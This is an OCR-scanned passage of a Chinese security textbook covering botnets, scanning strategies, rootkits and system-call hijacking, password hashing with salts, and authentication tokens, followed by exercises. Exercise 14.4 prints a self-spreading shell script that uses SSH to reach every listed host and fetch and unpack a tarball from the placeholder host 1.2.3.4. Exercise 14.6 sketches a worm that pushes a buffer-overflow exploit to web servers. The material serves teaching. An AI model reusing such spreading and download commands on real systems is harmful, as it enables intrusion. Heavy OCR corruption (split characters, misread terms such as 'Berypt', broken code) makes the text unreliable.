为 广告 的 点 击 数 付费 ， 在 僵尸 网 络 的 帮助 下 ， 这 些 点 击 可 以 被 “自动 ”完成 ， 几 千 个 价 
尸 会 点 击 弹 出 窗口 。 这 个 过 程 可 以 被 进一步 增强 ， 即 如 果 僵 尸 绑 定 了 被 攻破 的 机 器 的 主 
页 ， 则 受害 者 每 次 使 用 浏览 器 的 时 候 都 会 实施 一 次 “点 击 ”。 

@ 攻击 IRC 聊天 网 络 : 僵尸 网 络 还 被 用 于 攻击 因特网 中 继 聊天 (IRC) 网 络 。 最 受 攻击 者 
欢迎 的 攻击 方式 是 所 谓 的 克隆 攻击 一 一 在 这 类 攻击 中 ， 控 制 者 命令 每 个 僵尸 在 受害 的 
IRC 网 络 中 与 大 量 的 克隆 体 连接 ， 受 害 者 被 上 千 个 僵尸 的 服务 请 求 或 数 千 个 克隆 体 的 加 
人 频道 请 求 淹没 。 这 样 ， 受 害 的 IRC 网 络 被 拖 垮 ， 这 种 攻击 方式 类 似 DDoS 攻击 。 

o 操纵 在 线 投票 /游戏 : 在 线 投票 /游戏 正在 赢得 越 来 越 多 的 关注 ,而 它 非 常 容 易 被 僵尸 网 络 
操纵 。 由 于 每 个 僵尸 有 不 同 的 IP 地 址 , 每 个 投票 都 将 与 一 个 真实 的 人 的 投票 具有 相间 的 
可 信 性 。 在 线 游 戏 也 可 以 以 类 似 的 方式 进行 操纵 。 

远程 控制 

远程 控制 能 力 是 僵尸 不 同 于 蠕虫 之 处 。 蠕虫 繁衍 自身 并 和 触发 自身 , 但 是 僵尸 被 某 些 中 心 设备 
控制 ， 至 少 在 初始 阶段 如 此 。 

远程 控制 的 一 个 典型 实施 方式 是 利用 IRC 服务 器 ， 全 部 的 僵尸 加 入 这 个 服务 器 上 的 一 个 特 
定 的 频道 并 将 收 到 的 消息 作为 命令 。 近 年 来 僵尸 网 络 倾向 于 避免 IRC 机 制 并 通过 类 似 于 HTTP 
之 类 的 协议 使 用 隐秘 的 信道 。 分 布 式 控制 机 制 也 经 常 被 用 到 以 预防 某 个 点 的 失败 。 

一 有 旦 一 个 控制 模块 与 僵尸 之 间 的 通信 途径 被 建立 , 控制 模块 就 可 以 触发 僵尸 了 。 在 最 简单 的 
情况 下 ,控制 模块 只 是 向 僵尸 发 布 命令 ,使 得 僵尸 根据 已 经 在 其 内 部 实现 的 程序 执行 相应 的 操作 。 
在 更 复杂 的 情况 下 ， 控 制 模块 可 以 发 布 更 新 命令 使 得 僵尸 从 某 些 网 络 地 址 下 载 文件 并 执行 该 文 
件 。 在 后 一 种 情况 下 ， 俱 尸 成 为 了 一 种 更 加 通用 的 工具 ， 可 以 被 用 来 实施 多 种 多 样 的 攻击 。 


构建 攻击 网 络 
僵尸 网 络 攻击 的 第 一 步 是 攻击 者 要 用 僵尸 软件 感染 大 量 的 机 器 ,这些 机 器 最 终 将 用 于 实施 攻 
击 。 攻 击 的 这 一 阶段 的 基本 要 素 如 下 : 
1) 实施 攻击 的 软件 。 这 种 软件 必须 能 够 在 大 量 机 器 上 运行 ， 必 须 能 够 隐藏 自己 的 存在 ， 必 
须 能 够 与 攻击 者 通信 或 有 某 种 时 间 和 触发 机 制 ， 还 必须 能 够 向 目标 发 动 著 意 攻击 。 
2) 存在 于 大 量 系统 上 的 漏洞 。 攻 击 者 必须 发 现 一 种 许多 系统 管理 员 和 个 人 用 户 没 有 修补 且 
使 得 攻击 者 能 够 安装 僵尸 软件 的 漏洞 。 
3 ) 定位 并 识别 脆弱 机 器 的 策略 ， 该 过 程 称 做 扫描 或 指纹 识别 。 
在 扫描 阶段 , 攻击 者 首先 找 出 大 量 脆弱 的 机 器 并 感染 它们 。 随 后 ,一般 地 , 安装 在 被 感染 的 
机 器 上 的 僵尸 软件 重复 相同 的 扫描 过 程 ， 直 到 建立 一 个 由 被 感染 的 机 器 组 成 的 大 的 分 布 式 网 络 。 
[MIRK04] 列 出 了 扫描 策略 的 种 类 : 
o 随机 : 每 个 被 攻破 的 主机 在 IP 地 址 空间 内 探查 由 不 同 的 种 子 生成 的 随机 地 址 。 这 种 技术 
将 引起 大 量 的 因特网 流量 ， 这 可 能 会 在 实际 攻击 实施 前 就 造成 全 面 的 网 络 中 断 。 
@ 暗杀 名 单 : 攻击 者 首先 编制 一 个 关于 可 能 容易 受害 的 机 器 的 长 列表 。 为 了 避免 被 发 现 攻 
击 正在 进行 中 ， 这 可 能 是 一 个 需要 经 过 很 长 的 时 期 才能 完成 的 缓慢 过 程 。 当 列表 被 编辑 


B1 偶 ” 矿 学 和 疡 侈 会 威 如 447 


好 ， 攻 击 者 开始 感染 列表 上 的 机 器 ， 每 个 被 感染 的 机 器 需要 扫描 列表 的 一 部 分 。 这 种 策 
略 使 得 扫描 时 期 非常 短 ， 使 得 发 现 感染 发 生变 得 十 分 困难 。 

o 拓扑 : 这 种 方法 使 用 被 感染 的 受害 机 器 内 包含 的 信息 来 发 现 更 多 的 主机 并 进行 扫描 。 

@ 本 地 子 网 :如果 一 个 主机 可 以 在 防火 墙 内 部 被 感染 ， 该 主机 随后 将 在 它 自身 所 在 的 本 地 
网 络 中 寻找 目标 。 该 主机 使 用 子 网 地 址 结构 来 发 现 其 他 本 应 被 防火 墙 保护 的 主机 。 


14.6 rootkits 


rootkit 是 安装 在 系统 上 维护 对 该 系统 的 管理 员 ( 或 root ) 访问 的 一 系列 程序 的 集合 。root 访 
问 权 限 提供 了 对 操作 系统 上 所 有 功能 和 服务 的 访问 rootkit 以 一 种 恶意 和 秘密 的 方式 改变 主机 的 
标准 功能 。 有 了 root 访问 权限 ， 攻 击 者 就 有 了 对 系统 的 完全 控制 权 ， 可 以 添加 或 更 改 程序 和 文 
件 、 监 控 进 程 、 发 送 和 接收 网 络 消息 、 根 据 需要 获得 后 门 访问 。 
rootkit 可 以 对 系统 做 出 很 多 更 改 以 隐藏 其 自身 ， 使 用 户 难 以 确定 rootkit 是 否 存在 ， 难 以 识 
别 已 经 进行 了 哪些 更 改 。 本 质 上 ，rootkit 通过 扰乱 计算 机 上 对 进程 、 文 件 和 注册 表 的 监控 和 报告 
机 制 来 隐藏 自己 。 根 据 是 否 能 在 重启 和 执行 模式 下 存在 rootkit 可 以 分 为 
@ 永久 的 : 在 每 次 系统 引导 时 激活 。 这 类 rootkit 必须 将 代码 存储 于 永久 性 介质 ( 如 寄存 器 
或 文件 系统 ) 中 并 设 定 一 种 无 需 用 户 干 预 的 代码 执行 方法 。 
o 基于 内 存 的 : 无 永久 性 代码 ， 因 此 不 能 在 重启 后 存在 。 
@ 用 户 态 的 : 截获 对 API (应 用 程序 接口 ) 的 调用 并 更 改 返 回 结 果 。 例 如 当 应 用 程序 执行 
目录 列表 操作 时 ， 返 回 的 结果 不 包括 与 rootkit 相关 的 文件 标识 符 。 
@ 内 核 态 的 : 截获 对 内 核 态 下 本 地 API 的 调用 。rootkit 还 可 以 通过 将 恶意 进程 从 内 核 态 的 
活路 进程 列表 中 移 除 来 隐藏 该 恶意 进程 。 


14.6.1 rootkit 安装 


与 蠕虫 或 僵尸 不 同 rootkit 不 直接 依赖 于 漏洞 来 进入 计算 机 。 一 种 rootkit 安装 的 方法 是 通 
过 特洛伊 木马 程序 , 用户 被 引导 装载 一 个 特洛伊 木马 ,此 后 由 该 特洛伊 木马 安装 rootkit。 另 一 个 
方法 是 通过 黑客 行为 ， 以 下 列 出 的 作为 通过 黑客 攻击 来 安装 rootkit 的 方式 很 典型 [GEER06]。 

1 ) 攻击 者 使 用 工具 识别 打开 的 端口 或 其 他 漏洞 。 

2) 攻击 者 使 用 口令 破解 、 恶 意 软 件 或 系统 漏洞 获得 初始 访问 权 并 最 终 获 得 root 访问 权 。 

3 ) 攻击 者 上 传 rootkit 到 受害 机 器 。 

4) 攻击 者 向 rootkit 载荷 中 加 入 病毒 、 拒 绝 服务 攻击 或 其 他 类 型 的 攻击 。 

5) 攻击 者 运行 rootkit 安装 脚本 。 

6 ) rootkit 替换 二 进 制 码 、 文 件 、 命 令 或 系统 工具 来 隐藏 自己 。 

7) rootkit 监听 一 个 目标 服务 器 的 端口 ， 安 装 嗅 探 器 或 键盘 记录 器 ， 激 活 恶 意 载 荷 ， 或 执 

行 其 他 危及 受害 机 器 安全 的 步骤 。 


14.6.2 ”系统 级 调用 攻击 


用 户 态 程序 与 内 核 通过 系统 调用 进行 交互 ， 因 此 系统 调用 是 内 核 态 rootkit 实现 隐藏 的 主要 
目标 。 作 为 解释 rootkit 如 何 操作 的 例子 ， 我 们 看 一 个 Linux 中 的 系统 调用 的 实现 。 在 Linux 中 ， 
每 个 系统 调用 都 被 赋予 一 个 唯一 的 系统 调用 号 , 当 用 户 态 进程 执行 一 个 系统 调用 时 , 进程 通过 这 
个 号 引用 系统 调用 。 内 核 维护 一 个 系统 调用 表 , 每 个 系统 调用 程序 对 应 其 中 一 个 条 目 , 每 个 条 目 
包含 一 个 指向 对 应 系统 调用 程序 的 指针 。 系 统 调用 号 提供 了 系统 调用 表 中 的 一 个 索引 。 

[LEVI06] 列 出 了 三 种 用 于 更 改 系 统 调用 的 技术 : 
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@ 更 改 系统 调用 表 : 攻击 者 更 改 存储 在 系统 调用 表 中 的 选 定 的 系统 调用 地 址 , 这 使 得 rootkit 
能 够 将 一 个 系统 调用 从 一 个 合法 的 程序 重 定 向 到 rootkit 中 替代 该 程序 的 程序 。 图 14.6 
表明 了 knark rootkit 有 是 如 何 完成 此 做 法 的 。 

o 更 改 系统 调用 表 目 标 : 攻击 者 用 恶意 代码 覆盖 选 定 的 合法 系统 调用 程序 ， 系 统 调 用 表 不 





进行 更 改 。 
© 重 定向 系统 调用 表 : 攻击 者 将 对 整个 系统 调用 表 的 引用 重 定向 到 一 个 新 的 内 核 内 存 位 置 
上 的 新 表 。 
a) 正常 的 核心 内 存 分 布 b) 安装 了 nkark 之 后 


图 14.6 ”被 rootkit 更 改 的 系统 调用 表 


14.7 ”推荐 读物 和 网 站 


本 章 内 容 的 更 多 细节 可 以 在 [STAL08] 中 找到 。 
STALOS8 Stallings, W., and Brown L. Computer Security: Principles and Practice. Upper Saddle River, NJ: 
Prentice Hall, 2008. 


推荐 网 站 


© 计算 机 安全 资源 中 心 : 由 国家 标准 技术 局 (NIST) 维护 ， 包 括 安全 威胁 、 技 术 和 标准 相关 的 大 量 
信息 。 

@ CERT 协调 中 心 : 该 机 构 从 美国 国防 部 高 等 研究 计划 局 (DARPA ) 的 计算 机 紧急 响应 小 组 发 展 而 
来 。 网 站 中 提供 了 很 好 的 因特网 安全 威胁 、 漏 洞 和 攻击 统计 信息 。 

@ Vmyths: 致力 于 发 现 病毒 恶作剧 和 消除 对 于 真实 病毒 的 误解 。 


148 ”关键 术语 、 复 习题 和 习题 


关键 术语 

间 责 拒绝 服务 ARH 抵赖 (或 声誉 ) 
主动 攻击 中 断 入 侵 系统 完整 性 
资产 aa 逻辑 炸弹 威胁 

攻击 伪造 宏 病毒 流量 分 析 
认证 性 电子 邮件 恶意 软件 陷阱 站 

可 用 性 病毒 恶意 软件 特洛伊 木马 
an 黑客 伪装 臭 改 

机 密 性 内 部 攻击 被 动 攻击 病毒 

数据 完整 性 完整 性 隐私 病毒 套件 
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复习 题 

14.1 定义 计算 机 安全 。 

142 ”计算 机 安全 着 重 的 基本 需求 是 什么 ? 
14.3 ”被 动 攻击 和 主动 攻击 的 区 别 是 什么 ? 
14.4 列举 和 简要 定义 三 类 入 侵 者 。 

14.5 列举 和 简要 定义 三 种 人 侵 者 行为 模式 。 
14.6 ”压缩 在 病毒 行为 中 的 角色 是 什么 ? 
14.7 ”加 密 在 病毒 行为 中 的 角色 是 什么 ? 
14.8 ”病毒 或 蠕虫 行为 的 典型 阶段 是 什么 ? 
14.9 ”通常 情况 下 ， 蠕 虫 怎 么 扩散 ? 
14.10 AF A rootkit 的 区 别 是 什么 ? 


习题 

14.1 假设 口令 是 从 26 个 字母 里 选 出 来 的 4 个 字母 的 组 合 。 假 设 攻击 者 能 一 秒 钟 获取 一 个 密码 。 
a) 假设 攻击 者 每 次 尝试 结束 的 时 候 才 给 出 反馈 ， 发 现 正确 口令 的 期 望 时 间 是 多 少 ? 
b) 假设 攻击 者 每 次 输入 一 个 错误 的 字母 时 都 给 出 反馈 ， 发 现 正确 口令 的 期 望 时 间 是 多 少 ? 

14.2 图 14.1 中 的 病毒 程序 有 一 个 缺陷 ， 请 指出 来 。 

14.3 ” 当 考 虑 是 否 有 可 能 开发 出 一 个 程序 去 验证 另 一 个 程序 是 否 是 一 个 病毒 时 ， 产 生 了 一 个 问题 。 比 如 假 
设 程序 D 能 实现 此 功能 ， 也 就 是 说 ， 对 任意 程序 P， 如 果 运 行 D (P) ,返回 结果 是 TRUE (P 是 病 
毒 ) 或 者 FALSE (P 不 是 病毒 ) 。 现 在 考虑 如 下 的 程序 : 


Program CV := 
{us 
main-program := 
{if D(CV) then goto next: 
else infect-executable; 
} 


next: 


} 
在 上 面 这 段 代 码 中 , 函数 infect-executable 的 功能 是 扫描 可 执行 程序 的 内 存 , 并 在 这 些 程序 中 复制 自 
己 。 请 判断 D 能 不 能 正确 识别 CV 是 一 个 病毒 。 
14.4 考虑 在 UNIX 类 型 的 系统 上 的 这 样 一 段 脚本 。 假 设 它 被 命名 为 “1ls-1” 并 且 被 恶意 地 存放 在 
${HOME}/bin 目录 下 : 
if test -n "${SSH_AGENT_PID}" ; then 
exec 2>/dev/null 
(cd ${HOME}/bin && for system in $(cat/etc/hosts| 
grep -v '#') ; do ssh ${systm} "wget -o - 
http://1.2.3.4./ls-1.tar| tar xf -" 
done >/dev/null) 
rm-f£${HOME}/bin/ls-1 
fi 
exec ls-1"${@}" 
这 个 恶意 软件 是 什么 类 型 的 ? 
14.5 考虑 如 下 代码 段 : 
legitimate code 
if data is Friday the 13th; 
crash_computer(); 
legitimate code 
请 问 这 是 什么 类 型 的 恶意 软件 ? 
14.6 考虑 如 下 这 段 C++ 代码 : 
void webserver startup_plugin( known_hosts) 


{ 
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for(int i=0; known_hosts[i] ;i++){ 
vulnerable_web_servert ws(knowm_hosts[i] ,80); 
if (ws.buffer_overflow_exploit) | 
tep_connection c (known_hosts [i] ,80); 
c.send(ws.buffer_overflow_exploit_data) ; 


c.send(ws.infect_webserver_with_plugin) ; 
c.send(ws.trigger server reset); 
c.close({); 


} 
} 
假设 一 个 服务 器 的 启动 序列 已 经 被 这 段 代 码 感染 ， 那 么 这 是 什么 类 型 的 恶意 软件 ? 


14.7 ”如 下 代码 段 是 病毒 指令 序列 和 该 版 本 病毒 的 一 个 变种 。 描 述 变种 代码 产生 的 效果 。 
初始 代码 变种 代码 


mov eax, 5 mov eax, 5 
add eax, ebx push ecx 
call [eax] pop ecx 

add eax, ebx 


swap eax, ebx 


swap ebx, eax 
call [eax] 
nop 





第 15 章 计算 机 安全 技术 
本 章 介绍 用 于 应 对 第 14 章 中 讨论 的 安全 威胁 的 常见 措施 。 


15.1 身份 验证 


在 大 多 数 计算 机 安全 环境 中 , 用 户 身 份 验 证 是 基础 的 构建 块 和 主要 的 防御 线 。 用户 身 份 验证 
是 大 多 数 类 型 的 访问 控制 和 用 户 审核 的 基础 。RFC 2828 将 用 户 身份 验证 定义 如 下 : 

验证 一 个 由 系统 实体 声明 的 或 为 系统 实体 声明 的 身份 的 过 程 。 身 份 验 证 过 程 包括 两 个 步骤 ; 

@ 识别 步骤 : 为 安全 系统 提供 一 个 标识 符 。( 标识 符 应 该 谨 导 分配， 因为 通过 认证 的 身份 是 

其 他 安全 服务 的 基础 ， 比 如 访问 控制 服务 。) 

o 验证 步骤 : 提供 或 生成 身份 验证 信息 ， 确 定 实体 与 标识 符 之 间 的 绑 定 。 

例如 , 用 户 Alice Toklas 可 能 具有 用 户 标识 符 ABTOKLAS。 此 信息 需要 存储 在 Alice 希望 使 
用 的 而 且 可 被 系统 管理 员 和 其 他 用 户 获知 的 任何 服务 器 或 计算 机 系统 上 。 与 此 用 户 ID 相关 联 的 
一 项 典型 的 身份 验证 信息 是 密码 ， 这 是 保密 的 (只 有 Alice 和 系统 知道 ) 。 如 果 没 有 人 能 够 获得 
或 猜测 Alice 的 密码 ,那么 Alice 的 用 户 ID 和 密码 的 组 合 就 能 够 让 管理 员 设 置 Alice 的 访问 权限 ， 
并 审核 其 活动 。 因 为 Alice 的 ID 不 是 保密 的 ， 系 统 用 户 可 以 给 她 发 送 E-mail， 但 因为 她 的 密码 
是 保密 的 ， 所 以 没有 人 能 够 假装 成 Alice。 

KEE, 身份 识别 是 用 户 为 系统 提供 已 声明 身份 的 方法 ; 用 户 身 份 验证 是 建立 声明 有 效 性 的 方 
法 。 注 意 ， 用 户 身份 验证 与 消息 身份 验证 是 完全 不 同 的 。 正 如 在 第 2 章 中 所 定义 的 ， 消 息 身份 验证 
是 一 个 允许 通信 方 验证 已 收 信息 的 内 容 尚未 更 改 且 来 源 可 靠 的 过 程 。 本 章 只 关注 用 户 身份 验证 。 


15.1.1 身份 验证 方法 


验证 用 户 身份 通常 有 四 种 方法 ， 它 们 可 以 单独 使 用 也 可 以 组 合 使 用 : 

@ 个 人 知道 什么 : 例如 密码 、 个 人 识别 号 码 (PIN ) ， 或 对 预先 设置 的 一 组 问题 的 回答 。 

@ 个 人 拥有 什么 : 例如 电子 密 钥 卡 、 智 能 卡 和 物理 密 钥 。 这 种 认证 器 类 型 称 为 令 何 。 

@ 个 人 是 什么 〈 静 态 生物 测定 学 ) : 例如 指纹 识别 、 视 网 膜 识别 和 面部 识别 。 

@ 个 人 做 什么 〈 动 态 生物 测定 学 ) : 例如 语音 模式 、 笔 迹 特征 和 打字 周期 的 识别 。 

所 有 这 些 方法 ， 经 过 正确 实施 和 使 用 ,都 可 以 提供 安全 的 用 户 身份 验证 。 但 是 ， 每 种 方法 都 
有 问题 。 对 手 可 能 会 猜测 或 盗窃 密码 。 同 样 ， 对 手 可 能 仿造 或 窃取 令 牌 。 用 户 可 能 忘记 密码 或 丢 
失 令 牌 。 此 外 , 在 系统 上 管理 密码 和 令 牌 信息 并 保护 这 些 信 息 会 产生 大 量 的 管理 开销 。 对 于 生物 
测定 认证 器 ， 也 存在 各 种 各 样 的 问题 ， 包 括 处 理 误 报 率 和 漏 报 率 、 用 户 验 收 、 成 本 和 方便 性 。 


15.1.2 ”基于 密码 的 身份 验证 


针对 入 侵 者 广泛 使 用 的 防御 线 是 密码 系统 。 几 乎 所 有 的 多 用 户 系统 、 基 于 网 络 的 服务 器 、 基 
于 Web 的 电子 商务 网 站 和 其 他 类 似 服务 都 需要 用 户 不 仅 提供 名 称 或 标识 符 (ID), 还 需要 提供 密 
码 。 系 统 将 密码 与 先前 存储 的 、 在 一 个 系统 密码 文件 中 维护 的 此 用 户 ID 的 密码 进行 比较 。 密 码 
用 于 验证 登录 到 系统 的 个 人 的 ID。 反 过 来 ，ID 使 用 下 列 方式 提供 了 安全 性 : 

© ID 确定 用 户 是 否 有 权 获得 对 系统 的 访问 。 在 一 些 系统 中 , 只 有 那些 已 经 在 系统 中 存 有 ID 
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的 用 户 才 被 允许 获得 访问 。 

© ID 确定 用 户 相 应 的 权限 。 只 有 少数 用 户 可 能 具有 监督 或 “超级 用 户 ” 状 态 ， 从 而 允许 他 
们 读 取 文 件 并 执行 由 操作 系统 特殊 保护 的 功能 。 一 些 系 统 具 有 guet 或 匿名 账户 ， 这 些 
账户 的 用 户 比 其 他 用 户 的 权限 有 限 。 

o ID 用 于 所 谓 的 自主 访问 控制 中 。 例如, 通过 列 出 其 他 用 户 的 ID, 用 户 可 以 授权 他 们 读 取 
该 用 户 拥 有 的 文件 。 


散 列 密码 的 使 用 

一 项 广泛 使 用 的 密码 安全 技术 是 散 列 密码 和 salt 值 的 使 用 。 此 方法 建立 在 几乎 所 有 UNIX 变 
种 以 及 许多 其 他 操作 系统 上 。 其 中 使 用 了 下 列 过 程 ( 见 图 15.1a )。 要 将 新 密码 加 载 到 系统 中 , 用 
户 选择 一 个 密码 或 被 分 配 一 个 密码 。 此 密码 与 固定 长 度 的 salt 值 [MORR79] 组 合 使 用 。 在 比较 老 
的 实现 中 ， 此 值 与 密码 分 配给 用 户 的 时 间 有 关 。 较 新 的 实现 使 用 伪 随 机 数 或 随机 数 。 密 码 和 salt 
值 充当 散 列 算法 的 输入 , 来 生成 固定 长 度 的 散 列 码 。 散 列 算法 被 设计 为 执行 很 慢 , 从 而 阻止 攻击 。 
然后 , 散 列 密码 连同 salt 值 的 明文 副本 被 存储 在 相应 用 户 ID 的 密码 文件 中 。 针对 许多 密码 攻击 ， 
散 列 密码 方法 已 经 被 证 明 是 安全 的 [WAGN00]。 


密码 文件 
用 户 ID 用 户 ID salt 值 散 列 码 


密码 





散 列 密码 
a) 加 载 新 密码 b) 验证 密码 





图 15.1 UNIX 密码 方案 


当 用 户 尝试 登录 UNIX 系统 时 ， 用 户 提供 ID 和 密码 ( 见 图 15.1b )。 操 作 系 统 使 用 ID RK 
引 密码 文件 并 检索 明文 salt 和 加 密 密 码 。salt 和 用 户 提供 的 密码 用 作 加 密 例 程 的 输入 ， 如 果 结 果 
与 存储 值 相 匹配 ， 则 接受 密码 。 

salt 的 三 个 用 途 如 下 : 

@ 防止 重复 的 密码 在 密码 文件 中 可 见 。 即 使 两 个 用 户 选 择 相同 的 密码 ， 对 这 些 密码 也 将 分 

配 不 同 的 salt 值 。 因 此 ， 两 个 用 户 的 散 列 密码 将 不 同 。 

o 极 大 地 增加 离线 字典 攻击 的 难度 。 对 于 一 个 b 位 长 度 的 salt， 可 能 的 密码 数 按 2 的 系数 

增长 ， 从 而 增加 了 字典 攻击 中 猜测 密码 的 难度 。 

@ 当 一 个 人 在 两 个 或 多 个 系统 上 具有 密码 时 ， 查 明 其 是 否 在 所 有 系统 上 使 用 了 相同 的 密码 

几乎 是 不 可 能 的 。 

弄 清 楚 第 二 点 , 需要 考虑 一 下 离线 字典 攻击 的 工作 方式 。 攻击 者 获取 密码 文件 的 副本 。 首选 
假设 不 使 用 salt。 攻 击 者 的 目标 是 猜测 单个 密码 。 为 此 ,攻击 者 将 大 量 可 能 的 密码 提交 给 散 列 甘 
数 。 如 果 任 何 一 次 猪 测 与 文件 中 的 一 个 散 列 匹配 的 话 ， 则 攻击 者 已 经 找到 了 文件 中 的 密码 。 但 面 
对 UNIX 方案 ,攻击 者 必须 进行 每 一 个 猜测 并 针对 字典 文件 中 的 每 个 salt 值 将 其 提交 给 散 列 函数 
一 次 ， 从 而 成 倍 地 增加 了 必须 进行 猜测 的 次 数 。 
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UNIX 密码 方案 有 两 个 威胁 。 首 先 , 用 户 可 以 使 用 guest 账户 或 其 他 方法 获取 对 机 器 的 访问 ， 
然后 在 此 机 器 上 运行 密码 猜测 程序 , 即 密码 破解 器 。 攻击 者 应 该 能 够 检查 上 千 个 可 能 的 密码 而 
只 使 用 少量 的 资源 消耗 。 此 外 ， 如 果 一 个 对 手 能 够 获取 密码 文件 的 副本 ， 则 破解 器 程序 可 以 自由 
运行 在 其 他 机 器 上 。 这 使 得 对 手 可 以 以 合理 的 周期 运行 数 百 万 个 可 能 的 密码 。 

UNIX 实现 

从 UNIX 早期 发 展 以 来 , 大 多 数 实现 都 依赖 于 下 列 密码 方案 。 每 个 用 户 选 择 一 个 长 达 8 个 可 
打印 字符 的 密码 。 这 转换 为 一 个 56 位 值 (使 用 7 位 ASCII )， 用 作 加 密 例 程 的 密 钥 输入 。 散 列 例 
程 称 为 crypt(3)， 它 基于 DES, 使 用 12 位 salt 值 ， 修改 后 的 DES 算法 使 用 包含 64 位 零 块 的 数据 
输入 执行 。 然 后 将 算法 的 输出 用 作 二 次 加 密 的 输入 ， 这 个 过 程 针 对 总 共 25 次 加 密 重 复 进 行 。 然 
后 ， 得 到 的 64 位 输出 转换 为 11 字符 序列 。crypt(3) 例 程 主要 用 于 防止 猜测 攻击 。DES 的 软件 实 
现 相 对 于 硬件 版 本 比较 慢 ， 使 用 25 次 迭代 是 原 所 需 时 间 的 25 售 。 

这 个 特殊 的 实现 现在 被 视 为 是 不 堪 重 负 。 例 如 ，[PERR03] 报 告 了 使 用 超级 计算 机 的 字典 攻 
击 结果 。 攻 击 能 够 在 大 约 80 分 钟 内 处 理 5 000 万 次 密码 猜测 。 此 外 ， 结 果 表 明 ， 耗 资 约 10 000 
美元 , 任何 人 都 应 该 能 够 在 几 个 月 内 使 用 一 台 单 处 理 器 机 器 做 同样 的 事情 。 尽 管 其 缺点 显著 , 但 
为 了 与 现 有 账户 管理 软件 兼容 或 用 在 多 供应 商 环 境 中 ， 此 UNIX 方案 通常 仍 是 必需 的 。 

UNIX 中 还 有 其 他 更 健壮 的 散 列 /salt 方 案 。 为 许多 UNIX 系统 ( 包括 Linux, Solaris 和 FreeBSD ) 
推荐 的 散 列 算 法 基于 MDS 安全 散 列 算法 (类 似 于 SHA-1, 但 没有 SHA-1 安全 ) 9 MDS 加 密 
例 程 使 用 长 达 48 位 的 salt， 而 且 在 密码 长 度 上 没有 任何 限制 。 它 产生 一 个 128 位 的 散 列 值 ， 远 
远 慢 于 crypt(3) 的 速度 。 为 了 达到 降低 速度 的 目的 ，MDS5 crypt 使 用 了 一 个 重复 1000 次 的 内 部 循 
环 。 

UNIX 散 列 /salt 机 制 中 最 安全 可 靠 的 版 本 可 能 就 是 为 OpenBSD 操作 系统 开发 的 版 本 ， 
OpenBSD 是 另 一 个 广泛 应 用 的 开源 UNIX 操作 系统 。 这 个 方案 曾经 在 [PROV99] 中 报导 过 ， 它 采 
用 基于 Blowfish 对 称 块 密码 方案 的 散 列 函数 ,这 个 散 列 函数 叫做 Berypt, 执行 起 来 非常 慢 。.Bcrypt 
允许 密码 长 度 达 到 55 个 字符 , 并 且 需 要 一 个 128 位 的 随机 salt A, 来 产生 一 个 192 位 的 散 列 值 。 
Berypt 包含 一 个 cot 变量 cost 变量 的 增长 导致 完成 一 个 Berypt 散 列 所 需要 的 时 间 也 相应 地 增 
长 cost 分 配 的 新 密码 是 可 以 配置 的 ， 因 此 ， 管 理 员 可 以 分 配 一 个 较 高 的 cost 给 某 些 特权 用 户 。 


15.1.3 ”基于 令 牌 的 身份 验证 


用 户 使 用 自身 拥有 的 一 个 对 象 来 验证 自己 的 身份 叫做 令 牌 , 在 这 一 段 , 我 们 将 检查 被 广 为 应 
用 的 两 种 不 同类 型 的 令 牌 ， 它 们 是 一 些 与 银行 卡 的 外 形 和 大 小 相似 的 卡 。 
记忆 卡 

记忆 卡 可 以 存储 但 是 并 不 能 处 理 数据 , 它 和 银行 卡 的 共同 点 是 在 卡 的 背面 都 有 一 个 磁 条 , 这 
个 磁 条 可 以 存储 简单 的 安全 代码 , 并 能 够 被 一 个 并 不 贵重 的 卡 阅读 器 读 取 ( 如 果 不 幸 的 话 , 也 有 
可 能 被 改写 ) 。 也 有 些 记 忆 卡 ， 内 部 用 的 是 电子 记忆 体 。 

记忆 卡 还 可 以 用 于 物理 访问 , 例如 宾馆 的 房间 。 为 了 验证 计算 机 用 户 身份 , 这 种 卡通 常 使 用 
某 种 形式 的 密码 或 个 人 识别 码 ( PIN ) ， 一 个 典型 的 应 用 就 是 自动 提 款 机 (ATM ) © 

记忆 卡 ， 再 加 上 一 个 PIN 或 密码 ， 比 起 单独 的 密码 而 言 ， 这 提供 了 显著 的 更 高 的 安全 性 ， 
对 方 必须 实际 得 到 这 张 卡 (或 者 复制 它 ) ， 再 加 上 知道 这 张 卡 的 PIN 才 行 ， 它 的 潜在 缺点 如 下 : 

@ 需要 特殊 的 读 卡 机 : 这 就 增加 了 使 用 令 牌 的 成 本 , 并 要 求 保 证 读 卡 器 硬件 和 软件 的 安全 性 。 


O 关于 散 列 算法 安全 的 讨论 见 附录 F。 
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o CHRR: 丢失 的 令 牌 暂时 阻止 其 所 有 者 获得 系统 的 访问 权 ， 因 此 ， 当 你 丢失 令 牌 的 时 
候 我 们 需要 管理 花费 ， 如 果 令 牌 被 创建 、 被 盗 或 被 伪造 ， 那 么 对 手 现在 只 需要 确定 密码 
即 可 获得 未 经 授权 的 访问 。 

@ 用 户 不 满 : 虽然 用 户 能 够 接受 使 用 记忆 卡 操作 ATM 机 的 方式 ， 但 是 使 用 计算 机 来 访问 
的 方式 可 能 会 被 认为 是 不 便利 的 。 


智能 卡 
各 种 各 样 的 设备 符合 智能 令 牌 的 要 求 ， 它 们 可 以 分 为 三 个 相互 独立 的 维度 : 
@ 物理 特性 : 智能 令 牌 包括 一 个 嵌 人 式 的 微 处 理 器 ， 看 起 来 像 银 行 卡 的 智能 令 牌 叫做 智能 
卡 ， 也 有 些 智 能 卡 看 起 来 像 计算 器 、 钥 匙 或 是 小 型 的 便携 设备 。 
@ 界面 : 指南 界面 包括 一 个 按键 区 和 一 个 使 用 者 交互 区 ， 智 能 令 牌 通过 一 个 电子 接口 与 兼 
容 的 读 / 写 卡 机 进行 交互 。 
@ 验证 协议 : 智能 令 牌 的 目的 就 是 提供 一 种 用 户 验 证 的 方式 ， 我 们 可 以 将 验证 协议 在 智能 
令 牌 上 的 用 法 分 为 三 类 : 
> BS: 通过 静态 协议 , 用 户 通过 令 牌 验证 自己 的 身份 , 令 牌 通过 计算 机 验证 用 户 的 身 
h, 后 半 个 协议 就 类 似 于 记忆 卡 的 操作 。 
> 动态 密码 发 生 器 : 在 这 种 情况 下 , 令 牌 周期 性 地 产生 一 个 唯一 的 密码 ( 例如 每 分 钟 产 
生 一 个 ) ， 这 个 密码 进入 计算 机 系统 用 于 验证 身份 , 不论 是 用 户 手工 输入 或 者 是 经 过 
令 牌 自动 生成 , 令 牌 和 计算 机 系统 都 必须 初始 化 并 保持 同步 ,以 便于 计算 机 知道 当前 
令 牌 产生 的 密码 。 
